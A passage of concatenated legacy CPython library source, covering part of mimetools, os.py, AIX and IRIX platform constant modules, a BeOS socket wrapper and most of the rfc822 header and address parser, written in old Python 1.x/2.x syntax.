n = len(name)
for p in self.plist:
if p[:n] == name:
return rfc822.unquote(p[n:])
return None
def getparamnames(self):
result = []
for p in self.plist:
i = string.find(p, '=')
if i >= 0:
result.append(string.lower(p[:i]))
return result
def getencoding(self):
if self.encodingheader == None:
return '7bit'
return string.lower(self.encodingheader)
def gettype(self):
return self.type
def getmaintype(self):
return self.maintype
def getsubtype(self):
return self.subtype
# Utility functions
# -----------------
# Return a random string usable as a multipart boundary.
# The method used is so that it is *very* unlikely that the same
# string of characters will every occur again in the Universe,
# so the caller needn't check the data it is packing for the
# occurrence of the boundary.
#
# The boundary contains dots so you have to quote it in the header.
_prefix = None
def choose_boundary():
global _prefix
import time
import random
if _prefix == None:
import socket
import os
hostid = socket.gethostbyname(socket.gethostname())
try:
uid = `os.getuid()`
except:
uid = '1'
try:
pid = `os.getpid()`
except:
pid = '1'
_prefix = hostid + '.' + uid + '.' + pid
timestamp = '%.3f' % time.time()
seed = `random.randint(0, 32767)`
return _prefix + '.' + timestamp + '.' + seed
# Subroutines for decoding some common content-transfer-types
def decode(input, output, encoding):
if encoding == 'base64':
import base64
return base64.decode(input, output)
if encoding == 'quoted-printable':
import quopri
return quopri.decode(input, output)
if encoding in ('uuencode', 'x-uuencode', 'uue', 'x-uue'):
import uu
return uu.decode(input, output)
if decodetab.has_key(encoding):
pipethrough(input, decodetab[encoding], output)
else:
raise ValueError, \
'unknown Content-Transfer-Encoding: %s' % encoding
def encode(input, output, encoding):
if encoding == 'base64':
import base64
return base64.encode(input, output)
if encoding == 'quoted-printable':
import quopri
return quopri.encode(input, output, 0)
if encoding in ('uuencode', 'x-uuencode', 'uue', 'x-uue'):
import uu
return uu.encode(input, output)
if encodetab.has_key(encoding):
pipethrough(input, encodetab[encoding], output)
else:
raise ValueError, \
'unknown Content-Transfer-Encoding: %s' % encoding
# The following is no longer used for standard encodings
# XXX This requires that uudecode and mmencode are in $PATH
uudecode_pipe = '''(
TEMP=/tmp/@uu.$$
sed "s%^begin [0-7][0-7]* .*%begin 600 $TEMP%" | uudecode
cat $TEMP
rm $TEMP
)'''
decodetab = {
'uuencode': uudecode_pipe,
'x-uuencode': uudecode_pipe,
'uue': uudecode_pipe,
'x-uue': uudecode_pipe,
'quoted-printable': 'mmencode -u -q',
'base64': 'mmencode -u -b',
}
encodetab = {
'x-uuencode': 'uuencode tempfile',
'uuencode': 'uuencode tempfile',
'x-uue': 'uuencode tempfile',
'uue': 'uuencode tempfile',
'quoted-printable': 'mmencode -q',
'base64': 'mmencode -b',
}
def pipeto(input, command):
pipe = os.popen(command, 'w')
copyliteral(input, pipe)
pipe.close()
def pipethrough(input, command, output):
tempname = tempfile.mktemp()
try:
temp = open(tempname, 'w')
except IOError:
print '*** Cannot create temp file', `tempname`
return
copyliteral(input, temp)
temp.close()
pipe = os.popen(command + ' <' + tempname, 'r')
copybinary(pipe, output)
pipe.close()
os.unlink(tempname)
def copyliteral(input, output):
while 1:
line = input.readline()
if not line: break
output.write(line)
def copybinary(input, output):
BUFSIZE = 8192
while 1:
line = input.read(BUFSIZE)
if not line: break
output.write(line)
```
#### File: cpython/Lib/os.py
```python
import sys
_names = sys.builtin_module_names
altsep = None
if 'posix' in _names:
name = 'posix'
linesep = '\n'
curdir = '.'; pardir = '..'; sep = '/'; pathsep = ':'
defpath = ':/bin:/usr/bin'
from posix import *
try:
from posix import _exit
except ImportError:
pass
import posixpath
path = posixpath
del posixpath
elif 'nt' in _names:
name = 'nt'
linesep = '\r\n'
curdir = '.'; pardir = '..'; sep = '\\'; pathsep = ';'
defpath = '.;C:\\bin'
from nt import *
for i in ['_exit']:
try:
exec "from nt import " + i
except ImportError:
pass
import ntpath
path = ntpath
del ntpath
elif 'dos' in _names:
name = 'dos'
linesep = '\r\n'
curdir = '.'; pardir = '..'; sep = '\\'; pathsep = ';'
defpath = '.;C:\\bin'
from dos import *
try:
from dos import _exit
except ImportError:
pass
import dospath
path = dospath
del dospath
elif 'os2' in _names:
name = 'os2'
linesep = '\r\n'
curdir = '.'; pardir = '..'; sep = '\\'; pathsep = ';'
defpath = '.;C:\\bin'
from os2 import *
try:
from os2 import _exit
except ImportError:
pass
import ntpath
path = ntpath
del ntpath
elif 'mac' in _names:
name = 'mac'
linesep = '\r'
curdir = ':'; pardir = '::'; sep = ':'; pathsep = '\n'
defpath = ':'
from mac import *
try:
from mac import _exit
except ImportError:
pass
import macpath
path = macpath
del macpath
else:
raise ImportError, 'no os specific module found'
del _names
sys.modules['os.path'] = path
# Super directory utilities.
# (Inspired by <NAME>; the doc strings are mostly his)
def makedirs(name, mode=0777):
"""makedirs(path [, mode=0777]) -> None
Super-mkdir; create a leaf directory and all intermediate ones.
Works like mkdir, except that any intermediate path segment (not
just the rightmost) will be created if it does not exist. This is
recursive.
"""
head, tail = path.split(name)
if head and tail and not path.exists(head):
makedirs(head, mode)
mkdir(name, mode)
def removedirs(name):
"""removedirs(path) -> None
Super-rmdir; remove a leaf directory and empty all intermediate
ones. Works like rmdir except that, if the leaf directory is
successfully removed, directories corresponding to rightmost path
segments will be pruned way until either the whole path is
consumed or an error occurs. Errors during this latter phase are
ignored -- they generally mean that a directory was not empty.
"""
rmdir(name)
head, tail = path.split(name)
while head and tail:
try:
rmdir(head)
except error:
break
head, tail = path.split(head)
def renames(old, new):
"""renames(old, new) -> None
Super-rename; create directories as necessary and delete any left
empty. Works like rename, except creation of any intermediate
directories needed to make the new pathname good is attempted
first. After the rename, directories corresponding to rightmost
path segments of the old name will be pruned way until either the
whole path is consumed or a nonempty directory is found.
Note: this function can fail with the new directory structure made
if you lack permissions needed to unlink the leaf directory or
file.
"""
head, tail = path.split(new)
if head and tail and not path.exists(head):
makedirs(head)
rename(old, new)
head, tail = path.split(old)
if head and tail:
try:
removedirs(head)
except error:
pass
# Make sure os.environ exists, at least
try:
environ
except NameError:
environ = {}
def execl(file, *args):
execv(file, args)
def execle(file, *args):
env = args[-1]
execve(file, args[:-1], env)
def execlp(file, *args):
execvp(file, args)
def execlpe(file, *args):
env = args[-1]
execvpe(file, args[:-1], env)
def execvp(file, args):
_execvpe(file, args)
def execvpe(file, args, env):
_execvpe(file, args, env)
_notfound = None
def _execvpe(file, args, env = None):
if env:
func = execve
argrest = (args, env)
else:
func = execv
argrest = (args,)
env = environ
global _notfound
head, tail = path.split(file)
if head:
apply(func, (file,) + argrest)
return
if env.has_key('PATH'):
envpath = env['PATH']
else:
envpath = defpath
import string
PATH = string.splitfields(envpath, pathsep)
if not _notfound:
import tempfile
# Exec a file that is guaranteed not to exist
try: execv(tempfile.mktemp(), ())
except error, _notfound: pass
exc, arg = error, _notfound
for dir in PATH:
fullname = path.join(dir, file)
try:
apply(func, (fullname,) + argrest)
except error, (errno, msg):
if errno != arg[0]:
exc, arg = error, (errno, msg)
raise exc, arg
# Change environ to automatically call putenv() if it exists
try:
# This will fail if there's no putenv
putenv
except NameError:
pass
else:
import UserDict
if name in ('os2', 'nt', 'dos'): # Where Env Var Names Must Be UPPERCASE
# But we store them as upper case
import string
class _Environ(UserDict.UserDict):
def __init__(self, environ):
UserDict.UserDict.__init__(self)
data = self.data
upper = string.upper
for k, v in environ.items():
data[upper(k)] = v
def __setitem__(self, key, item):
putenv(key, item)
key = string.upper(key)
self.data[key] = item
def __getitem__(self, key):
return self.data[string.upper(key)]
else: # Where Env Var Names Can Be Mixed Case
class _Environ(UserDict.UserDict):
def __init__(self, environ):
UserDict.UserDict.__init__(self)
self.data = environ
def __setitem__(self, key, item):
putenv(key, item)
self.data[key] = item
environ = _Environ(environ)
```
#### File: Lib/plat-aix3/FCNTL.py
```python
TRUE = 1
FALSE = 0
NBBY = 8
FHSIZE = 32
# Included from sys/select.h
# Included from sys/time.h
ITIMER_REAL = 0
ITIMER_VIRTUAL = 1
ITIMER_PROF = 2
ITIMER_VIRT = 3
TIMEOFDAY = 9
TIMERID_ALRM = (ITIMER_REAL)
TIMERID_REAL = (ITIMER_REAL)
TIMERID_VIRTUAL = (ITIMER_VIRTUAL)
TIMERID_PROF = (ITIMER_PROF)
TIMERID_VIRT = (ITIMER_VIRT)
TIMERID_TOD = (TIMERID_VIRT+1)
NALRM = 1
NPROF = 1
NVIRTUAL = 2
NTIMEOFDAY = 5
NTIMERS = (NALRM + NPROF + NVIRTUAL + NTIMEOFDAY)
MIN_SECS_SINCE_EPOCH = 0
uS_PER_SECOND = (1000000)
NS_PER_uS = (1000)
MAX_SECS_TO_uS = 4000
MAX_NS_TO_uS = 294967296
NS_PER_SEC = 1000000000
uS_PER_SEC = (NS_PER_SEC / 1000)
NS_PER_MSEC = (NS_PER_SEC / 1000)
MAX_DEC_SECS = 2
MAX_DEC_NS = 147483647
DST_NONE = 0
DST_USA = 1
DST_AUST = 2
DST_WET = 3
DST_MET = 4
DST_EET = 5
DST_CAN = 6
# Included from time.h
# Included from stddef.h
CLOCKS_PER_SEC = 1000000
CLK_TCK = 100
TIMELEN = 26
NLTBMAX = 64
NO_TIMEOUT = 0
INF_TIMEOUT = -1
def NFDS(x): return ((x) & 0x0000FFFF)
def LOW_HALF(x): return NFDS(x)
def NMSGS(x): return (((x) >> 16) & 0x0000FFFF)
def HIGH_HALF(x): return NMSGS(x)
FD_SETSIZE = 2048
def major(__x): return (int)((unsigned)(__x)>>16)
def minor(__x): return (int)((__x)&0xFFFF)
# Included from sys/flock.h
F_RDLCK = 01
F_WRLCK = 02
F_UNLCK = 03
INOFLCK = 1
SETFLCK = 2
SLPFLCK = 4
LCK_UNBLOCK = 0
LCK_BLOCKER = 1
LCK_BLOCKED = 2
LCK_WASBLOCK = 4
MAXEND = 017777777777
RMTLOCK = 1
def ENF_LOCK(mode): return (((mode) & (ISGID | IEXEC | (IEXEC >> 3) | (IEXEC >> 6))) == ISGID)
O_RDONLY = 00000000
O_WRONLY = 00000001
O_RDWR = 00000002
O_ACCMODE = 3
O_NONBLOCK = 00000004
O_APPEND = 00000010
O_CREAT = 00000400
O_TRUNC = 00001000
O_EXCL = 00002000
O_NOCTTY = 00004000
F_DUPFD = 0
F_GETFD = 1
F_SETFD = 2
F_GETFL = 3
F_SETFL = 4
F_GETLK = 5
F_SETLK = 6
F_SETLKW = 7
FD_CLOEXEC = 1
O_SYNC = 00000020
O_NONE = 00000003
O_EXEC = 00000040
O_RSHARE = 00010000
O_DEFER = 00020000
O_DELAY = 00040000
O_NDELAY = 00100000
O_NSHARE = 00200000
F_GETOWN = 8
F_SETOWN = 9
F_CLOSEM = 10
FNDELAY = O_NONBLOCK
O_NDELAY = O_NONBLOCK
FNDELAY = O_NDELAY
FNONBLOCK = O_NONBLOCK
FAPPEND = O_APPEND
FSYNC = O_SYNC
FASYNC = 00400000
FOPEN = (-1)
FREAD = (O_RDONLY-FOPEN)
FWRITE = (O_WRONLY-FOPEN)
FMPX = 00000200
FMASK = 00374377
FFCNTL = (FNONBLOCK|FNDELAY|FAPPEND|FSYNC|FASYNC)
FCREAT = O_CREAT
FTRUNC = O_TRUNC
FEXCL = O_EXCL
FRSHARE = O_RSHARE
FDEFER = O_DEFER
FDELAY = O_DELAY
FNDELAY = O_NDELAY
FNSHARE = O_NSHARE
FEXEC = O_EXEC
FNOCTTY = O_NOCTTY
FMOUNT = 01000000
FREVOKED = 0x20000000
FKERNEL = 0x40000000
FAIO = 00000100
FDOCLONE = 0x10000000
```
#### File: Lib/plat-beos/socket.py
```python
"Socket wrapper for BeOS, which does not support dup()."
# (And hence, fromfd() and makefile() are unimplemented in C....)
# XXX Living dangerously here -- close() is implemented by deleting a
# reference. Thus we rely on the real _socket module to close on
# deallocation, and also hope that nobody keeps a reference to our _sock
# member.
try:
from _socket import *
except ImportError:
from socket import *
_realsocketcall = socket
def socket(family, type, proto=0):
return _socketobject(_realsocketcall(family, type, proto))
class _socketobject:
def __init__(self, sock):
self._sock = sock
def close(self):
self._sock = 0
def __del__(self):
self.close()
def accept(self):
sock, addr = self._sock.accept()
return _socketobject(sock), addr
def dup(self):
return _socketobject(self._sock)
def makefile(self, mode='r', bufsize=-1):
return _fileobject(self._sock, mode, bufsize)
_s = "def %s(self, *args): return apply(self._sock.%s, args)\n\n"
for _m in ('bind', 'connect', 'fileno', 'listen',
'getpeername', 'getsockname',
'getsockopt', 'setsockopt',
'recv', 'recvfrom', 'send', 'sendto',
'setblocking',
'shutdown'):
exec _s % (_m, _m)
class _fileobject:
def __init__(self, sock, mode, bufsize):
self._sock = sock
self._mode = mode
if bufsize < 0:
bufsize = 512
self._rbufsize = max(1, bufsize)
self._wbufsize = bufsize
self._wbuf = self._rbuf = ""
def close(self):
try:
if self._sock:
self.flush()
finally:
self._sock = 0
def __del__(self):
self.close()
def flush(self):
if self._wbuf:
self._sock.send(self._wbuf)
self._wbuf = ""
def fileno(self):
return self._sock.fileno()
def write(self, data):
self._wbuf = self._wbuf + data
if self._wbufsize == 1:
if '\n' in data:
self.flush()
else:
if len(self._wbuf) >= self._wbufsize:
self.flush()
def writelines(self, list):
filter(self._sock.send, list)
self.flush()
def read(self, n=-1):
if n >= 0:
while len(self._rbuf) < n:
new = self._sock.recv(self._rbufsize)
if not new: break
self._rbuf = self._rbuf + new
data, self._rbuf = self._rbuf[:n], self._rbuf[n:]
return data
while 1:
new = self._sock.recv(self._rbufsize)
if not new: break
self._rbuf = self._rbuf + new
data, self._rbuf = self._rbuf, ""
return data
def readline(self):
import string
data = ""
i = string.find(self._rbuf, '\n')
while i < 0:
new = self._sock.recv(self._rbufsize)
if not new: break
i = string.find(new, '\n')
if i >= 0: i = i + len(self._rbuf)
self._rbuf = self._rbuf + new
if i < 0: i = len(self._rbuf)
else: i = i+1
data, self._rbuf = self._rbuf[:i], self._rbuf[i:]
return data
def readlines(self):
list = []
while 1:
line = self.readline()
if not line: break
list.append(line)
return list
```
#### File: Lib/plat-irix6/IN.py
```python
_MIPS_ISA_MIPS1 = 1
_MIPS_ISA_MIPS2 = 2
_MIPS_ISA_MIPS3 = 3
_MIPS_ISA_MIPS4 = 4
_MIPS_SIM_ABI32 = 1
_MIPS_SIM_NABI32 = 2
_MIPS_SIM_ABI64 = 3
# Included from sys/endian.h
LITTLE_ENDIAN = 1234
BIG_ENDIAN = 4321
PDP_ENDIAN = 3412
BYTE_ORDER = BIG_ENDIAN
BYTE_ORDER = LITTLE_ENDIAN
def ntohl(x): return (x)
def ntohs(x): return (x)
def htonl(x): return (x)
def htons(x): return (x)
def htonl(x): return ntohl(x)
def htons(x): return ntohs(x)
# Included from sys/bsd_types.h
# Included from sys/mkdev.h
ONBITSMAJOR = 7
ONBITSMINOR = 8
OMAXMAJ = 0x7f
OMAXMIN = 0xff
NBITSMAJOR = 14
NBITSMINOR = 18
MAXMAJ = 0x1ff
MAXMIN = 0x3ffff
OLDDEV = 0
NEWDEV = 1
MKDEV_VER = NEWDEV
def major(dev): return __major(MKDEV_VER, dev)
def minor(dev): return __minor(MKDEV_VER, dev)
# Included from sys/select.h
# Included from standards.h
FD_SETSIZE = 1024
__NBBY = 8
# Included from string.h
NULL = 0L
NBBY = 8
IPPROTO_IP = 0
IPPROTO_ICMP = 1
IPPROTO_IGMP = 2
IPPROTO_GGP = 3
IPPROTO_IPIP = 4
IPPROTO_ENCAP = IPPROTO_IPIP
IPPROTO_ST = 5
IPPROTO_TCP = 6
IPPROTO_EGP = 8
IPPROTO_PUP = 12
IPPROTO_UDP = 17
IPPROTO_IDP = 22
IPPROTO_TP = 29
IPPROTO_XTP = 36
IPPROTO_RSVP = 46
IPPROTO_HELLO = 63
IPPROTO_ND = 77
IPPROTO_EON = 80
IPPROTO_OSPF = 89
IPPROTO_SWIPE = 94
IPPROTO_RAW = 255
IPPROTO_MAX = 256
IPPORT_RESERVED = 1024
IPPORT_MAXPORT = 65535
def IN_CLASSA(i): return (((__int32_t)(i) & 0x80000000) == 0)
IN_CLASSA_NET = 0xff000000
IN_CLASSA_NSHIFT = 24
IN_CLASSA_HOST = 0x00ffffff
IN_CLASSA_MAX = 128
def IN_CLASSB(i): return (((__int32_t)(i) & 0xc0000000) == 0x80000000)
IN_CLASSB_NET = 0xffff0000
IN_CLASSB_NSHIFT = 16
IN_CLASSB_HOST = 0x0000ffff
IN_CLASSB_MAX = 65536
def IN_CLASSC(i): return (((__int32_t)(i) & 0xe0000000) == 0xc0000000)
IN_CLASSC_NET = 0xffffff00
IN_CLASSC_NSHIFT = 8
IN_CLASSC_HOST = 0x000000ff
def IN_CLASSD(i): return (((__int32_t)(i) & 0xf0000000) == 0xe0000000)
IN_CLASSD_NET = 0xf0000000
IN_CLASSD_NSHIFT = 28
IN_CLASSD_HOST = 0x0fffffff
def IN_MULTICAST(i): return IN_CLASSD(i)
def IN_EXPERIMENTAL(i): return (((__int32_t)(i) & 0xf0000000) == 0xf0000000)
def IN_BADCLASS(i): return (((__int32_t)(i) & 0xf0000000) == 0xf0000000)
INADDR_NONE = 0xffffffff
IN_LOOPBACKNET = 127
IP_OPTIONS = 1
IP_HDRINCL = 2
IP_TOS = 3
IP_TTL = 4
IP_RECVOPTS = 5
IP_RECVRETOPTS = 6
IP_RECVDSTADDR = 7
IP_RETOPTS = 8
IP_MULTICAST_IF = 20
IP_MULTICAST_TTL = 21
IP_MULTICAST_LOOP = 22
IP_ADD_MEMBERSHIP = 23
IP_DROP_MEMBERSHIP = 24
IP_MULTICAST_VIF = 25
IP_RSVP_VIF_ON = 26
IP_RSVP_VIF_OFF = 27
IP_RSVP_ON = 28
IP_SENDSRCADDR = 36
IP_DEFAULT_MULTICAST_TTL = 1
IP_DEFAULT_MULTICAST_LOOP = 1
IP_MAX_MEMBERSHIPS = 20
```
#### File: cpython/Lib/rfc822.py
```python
import string
import time
_blanklines = ('\r\n', '\n') # Optimization for islast()
class Message:
"""Represents a single RFC-822-compliant message."""
def __init__(self, fp, seekable = 1):
"""Initialize the class instance and read the headers."""
if seekable == 1:
# Exercise tell() to make sure it works
# (and then assume seek() works, too)
try:
fp.tell()
except:
seekable = 0
else:
seekable = 1
self.fp = fp
self.seekable = seekable
self.startofheaders = None
self.startofbody = None
#
if self.seekable:
try:
self.startofheaders = self.fp.tell()
except IOError:
self.seekable = 0
#
self.readheaders()
#
if self.seekable:
try:
self.startofbody = self.fp.tell()
except IOError:
self.seekable = 0
def rewindbody(self):
"""Rewind the file to the start of the body (if seekable)."""
if not self.seekable:
raise IOError, "unseekable file"
self.fp.seek(self.startofbody)
def readheaders(self):
"""Read header lines.
Read header lines up to the entirely blank line that
terminates them. The (normally blank) line that ends the
headers is skipped, but not included in the returned list.
If a non-header line ends the headers, (which is an error),
an attempt is made to backspace over it; it is never
included in the returned list.
The variable self.status is set to the empty string if all
went well, otherwise it is an error message.
The variable self.headers is a completely uninterpreted list
of lines contained in the header (so printing them will
reproduce the header exactly as it appears in the file).
"""
self.dict = {}
self.unixfrom = ''
self.headers = list = []
self.status = ''
headerseen = ""
firstline = 1
startofline = unread = tell = None
if hasattr(self.fp, 'unread'):
unread = self.fp.unread
elif self.seekable:
tell = self.fp.tell
while 1:
if tell:
startofline = tell()
line = self.fp.readline()
if not line:
self.status = 'EOF in headers'
break
# Skip unix From name time lines
if firstline and line[:5] == 'From ':
self.unixfrom = self.unixfrom + line
continue
firstline = 0
if headerseen and line[0] in ' \t':
# It's a continuation line.
list.append(line)
x = (self.dict[headerseen] + "\n " + string.strip(line))
self.dict[headerseen] = string.strip(x)
continue
elif self.iscomment(line):
# It's a comment. Ignore it.
continue
elif self.islast(line):
# Note! No pushback here! The delimiter line gets eaten.
break
headerseen = self.isheader(line)
if headerseen:
# It's a legal header line, save it.
list.append(line)
self.dict[headerseen] = string.strip(line[len(headerseen)+2:])
continue
else:
# It's not a header line; throw it back and stop here.
if not self.dict:
self.status = 'No headers'
else:
self.status = 'Non-header line where header expected'
# Try to undo the read.
if unread:
unread(line)
elif tell:
self.fp.seek(startofline)
else:
self.status = self.status + '; bad seek'
break
def isheader(self, line):
"""Determine whether a given line is a legal header.
This method should return the header name, suitably canonicalized.
You may override this method in order to use Message parsing
on tagged data in RFC822-like formats with special header formats.
"""
i = string.find(line, ':')
if i > 0:
return string.lower(line[:i])
else:
return None
def islast(self, line):
"""Determine whether a line is a legal end of RFC-822 headers.
You may override this method if your application wants
to bend the rules, e.g. to strip trailing whitespace,
or to recognise MH template separators ('--------').
For convenience (e.g. for code reading from sockets) a
line consisting of \r\n also matches.
"""
return line in _blanklines
def iscomment(self, line):
"""Determine whether a line should be skipped entirely.
You may override this method in order to use Message parsing
on tagged data in RFC822-like formats that support embedded
comments or free-text data.
"""
return None
def getallmatchingheaders(self, name):
"""Find all header lines matching a given header name.
Look through the list of headers and find all lines
matching a given header name (and their continuation
lines). A list of the lines is returned, without
interpretation. If the header does not occur, an
empty list is returned. If the header occurs multiple
times, all occurrences are returned. Case is not
important in the header name.
"""
name = string.lower(name) + ':'
n = len(name)
list = []
hit = 0
for line in self.headers:
if string.lower(line[:n]) == name:
hit = 1
elif line[:1] not in string.whitespace:
hit = 0
if hit:
list.append(line)
return list
def getfirstmatchingheader(self, name):
"""Get the first header line matching name.
This is similar to getallmatchingheaders, but it returns
only the first matching header (and its continuation
lines).
"""
name = string.lower(name) + ':'
n = len(name)
list = []
hit = 0
for line in self.headers:
if hit:
if line[:1] not in string.whitespace:
break
elif string.lower(line[:n]) == name:
hit = 1
if hit:
list.append(line)
return list
def getrawheader(self, name):
"""A higher-level interface to getfirstmatchingheader().
Return a string containing the literal text of the
header but with the keyword stripped. All leading,
trailing and embedded whitespace is kept in the
string, however.
Return None if the header does not occur.
"""
list = self.getfirstmatchingheader(name)
if not list:
return None
list[0] = list[0][len(name) + 1:]
return string.joinfields(list, '')
def getheader(self, name, default=None):
"""Get the header value for a name.
This is the normal interface: it return a stripped
version of the header value for a given header name,
or None if it doesn't exist. This uses the dictionary
version which finds the *last* such header.
"""
try:
return self.dict[string.lower(name)]
except KeyError:
return default
get = getheader
def getaddr(self, name):
"""Get a single address from a header, as a tuple.
An example return value:
('<NAME>', '<EMAIL>')
"""
# New, by <NAME>
alist = self.getaddrlist(name)
if alist:
return alist[0]
else:
return (None, None)
def getaddrlist(self, name):
"""Get a list of addresses from a header.
Retrieves a list of addresses from a header, where each address is a
tuple as returned by getaddr(). Scans all named headers, so it works
properly with multiple To: or Cc: headers for example.
"""
raw = []
for h in self.getallmatchingheaders(name):
if h[0] in ' \t':
raw.append(h)
else:
if raw:
raw.append(', ')
i = string.find(h, ':')
if i > 0:
addr = h[i+1:]
raw.append(addr)
alladdrs = string.join(raw, '')
a = AddrlistClass(alladdrs)
return a.getaddrlist()
def getdate(self, name):
"""Retrieve a date field from a header.
Retrieves a date field from the named header, returning
a tuple compatible with time.mktime().
"""
try:
data = self[name]
except KeyError:
return None
return parsedate(data)
def getdate_tz(self, name):
"""Retrieve a date field from a header as a 10-tuple.
The first 9 elements make up a tuple compatible with
time.mktime(), and the 10th is the offset of the poster's
time zone from GMT/UTC.
"""
try:
data = self[name]
except KeyError:
return None
return parsedate_tz(data)
# Access as a dictionary (only finds *last* header of each type):
def __len__(self):
"""Get the number of headers in a message."""
return len(self.dict)
def __getitem__(self, name):
"""Get a specific header, as from a dictionary."""
return self.dict[string.lower(name)]
def __setitem__(self, name, value):
"""Set the value of a header.
Note: This is not a perfect inversion of __getitem__, because
any changed headers get stuck at the end of the raw-headers list
rather than where the altered header was.
"""
del self[name] # Won't fail if it doesn't exist
self.dict[string.lower(name)] = value
text = name + ": " + value
lines = string.split(text, "\n")
for line in lines:
self.headers.append(line + "\n")
def __delitem__(self, name):
"""Delete all occurrences of a specific header, if it is present."""
name = string.lower(name)
if not self.dict.has_key(name):
return
del self.dict[name]
name = name + ':'
n = len(name)
list = []
hit = 0
for i in range(len(self.headers)):
line = self.headers[i]
if string.lower(line[:n]) == name:
hit = 1
elif line[:1] not in string.whitespace:
hit = 0
if hit:
list.append(i)
list.reverse()
for i in list:
del self.headers[i]
def has_key(self, name):
"""Determine whether a message contains the named header."""
return self.dict.has_key(string.lower(name))
def keys(self):
"""Get all of a message's header field names."""
return self.dict.keys()
def values(self):
"""Get all of a message's header field values."""
return self.dict.values()
def items(self):
"""Get all of a message's headers.
Returns a list of name, value tuples.
"""
return self.dict.items()
def __str__(self):
str = ''
for hdr in self.headers:
str = str + hdr
return str
# Utility functions
# -----------------
# XXX Should fix unquote() and quote() to be really conformant.
# XXX The inverses of the parse functions may also be useful.
def unquote(str):
"""Remove quotes from a string."""
if len(str) > 1:
if str[0] == '"' and str[-1:] == '"':
return str[1:-1]
if str[0] == '<' and str[-1:] == '>':
return str[1:-1]
return str
def quote(str):
"""Add quotes around a string."""
return '"%s"' % string.join(
string.split(
string.join(
string.split(str, '\\'),
'\\\\'),
'"'),
'\\"')
def parseaddr(address):
"""Parse an address into a (realname, mailaddr) tuple."""
a = AddrlistClass(address)
list = a.getaddrlist()
if not list:
return (None, None)
else:
return list[0]
class AddrlistClass:
"""Address parser class by Ben Escoto.
To understand what this class does, it helps to have a copy of
RFC-822 in front of you.
Note: this class interface is deprecated and may be removed in the future.
Use rfc822.AddressList instead.
"""
def __init__(self, field):
"""Initialize a new instance.
`field' is an unparsed address header field, containing
one or more addresses.
"""
self.specials = '()<>@,:;.\"[]'
self.pos = 0
self.LWS = ' \t'
self.CR = '\r\n'
self.atomends = self.specials + self.LWS + self.CR
self.field = field
self.commentlist = []
def gotonext(self):
"""Parse up to the start of the next address."""
while self.pos < len(self.field):
if self.field[self.pos] in self.LWS + '\n\r':
self.pos = self.pos + 1
elif self.field[self.pos] == '(':
self.commentlist.append(self.getcomment())
else: break
def getaddrlist(self):
"""Parse all addresses.
Returns a list containing all of the addresses.
"""
ad = self.getaddress()
if ad:
return ad + self.getaddrlist()
else: return []
def getaddress(self):
"""Parse the next address."""
self.commentlist = []
self.gotonext()
oldpos = self.pos
oldcl = self.commentlist
plist = self.getphraselist()
self.gotonext()
returnlist = []
if self.pos >= len(self.field):
# Bad email address technically, no domain.
if plist:
returnlist = [(string.join(self.commentlist), plist[0])]
elif self.field[self.pos] in '.@':
# email address is just an addrspec
# this isn't very efficient since we start over
self.pos = oldpos
self.commentlist = oldcl
addrspec = self.getaddrspec()
returnlist = [(string.join(self.commentlist), addrspec)]
elif self.field[self.pos] == ':':
# address is a group
returnlist = []
self.pos = self.pos + 1
while self.pos < len(self.field):
self.gotonext()
if self.field[self.pos] == ';':
self.pos = self.pos + 1
break
returnlist = returnlist + self.getaddress()
elif self.field[self.pos] == '<':
# Address is a phrase then a route addr
routeaddr = self.getrouteaddr()
if self.commentlist:
returnlist = [(string.join(plist) + ' (' + \
string.join(self.commentlist) + ')', routeaddr)]
else: returnlist = [(string.join(plist), routeaddr)]
else:
if plist:
returnlist = [(string.join(self.commentlist), plist[0])]
elif self.field[self.pos] in self.specials:
self.pos = self.pos + 1
self.gotonext()
if self.pos < len(self.field) and self.field[self.pos] == ',':
self.pos = self.pos + 1
return returnlist
def getrouteaddr(self):
"""Parse a route address (Return-path value).
This method just skips all the route stuff and returns the addrspec.
"""
if self.field[self.pos] != '<':
return
expectroute = 0
self.pos = self.pos + 1
self.gotonext()
adlist = None
while self.pos < len(self.field):
if expectroute:
self.getdomain()
expectroute = 0
elif self.field[self.pos] == '>':
self.pos = self.pos + 1
break
elif self.field[self.pos] == '@':
self.pos = self.pos + 1
expectroute = 1
elif self.field[self.pos] == ':':
self.pos = self.pos + 1
expectaddrspec = 1
else:
adlist = self.getaddrspec()
self.pos = self.pos + 1
break
self.gotonext()
return adlist
def getaddrspec(self):
"""Parse an RFC-822 addr-spec."""
aslist = []
self.gotonext()
while self.pos < len(self.field):
if self.field[self.pos] == '.':
aslist.append('.')
self.pos = self.pos + 1
elif self.field[self.pos] == '"':
aslist.append(self.getquote())
elif self.field[self.pos] in self.atomends:
break
else: aslist.append(self.getatom())
self.gotonext()
if self.pos >= len(self.field) or self.field[self.pos] != '@':
return string.join(aslist, '')
aslist.append('@')
self.pos = self.pos + 1
self.gotonext()
return string.join(aslist, '') + self.getdomain()
def getdomain(self):
"""Get the complete domain name from an address."""
sdlist = []
while self.pos < len(self.field):
if self.field[self.pos] in self.LWS:
self.pos = self.pos + 1
elif self.field[self.pos] == '(':
self.commentlist.append(self.getcomment())
elif self.field[self.pos] == '[':
sdlist.append(self.getdomainliteral())
elif self.field[self.pos] == '.':
self.pos = self.pos + 1
sdlist.append('.')
elif self.field[self.pos] in self.atomends:
break
else: sdlist.append(self.getatom())
return string.join(sdlist, '')
def getdelimited(self, beginchar, endchars, allowcomments = 1):
"""Parse a header fragment delimited by special characters.
`beginchar' is the start character for the fragment.
If self is not looking at an instance of `beginchar' then
getdelimited returns the empty string.
`endchars' is a sequence of allowable end-delimiting characters.
Parsing stops when one of these is encountered.
If `allowcomments' is non-zero, embedded RFC-822 comments
are allowed within the parsed fragment.
"""
if self.field[self.pos] != beginchar:
return ''
slist = ['']
quote = 0
self.pos = self.pos + 1
while self.pos < len(self.field):
if quote == 1:
slist.append(self.field[self.pos])
quote = 0
elif self.field[self.pos] in endchars:
self.pos = self.pos + 1
break
elif allowcomments and self.field[self.pos] == '(':
slist.append(self.getcomment())
elif self.field[self.pos] == '\\':
quote = 1
else:
slist.append(self.field[self.pos])
self.pos = self.pos + 1
return string.join(slist, '')
def getquote(self):
"""Get a quote-delimited fragment from self's field."""
return self.getdelimited('"', '"\r', 0)
def getcomment(self):
"""Get a parenthesis-delimited fragment from self's field."""
return self.getdelimited('(', ')\r', 1)
def getdomainliteral(self):
"""Parse an RFC-822 domain-literal."""
return self.getdelimited('[', ']\r', 0)
def getatom(self):
"""Parse an RFC-822 atom."""
atomlist = ['']
while self.pos < len(self.field):
if self.field[self.pos] in self.atomends:
break
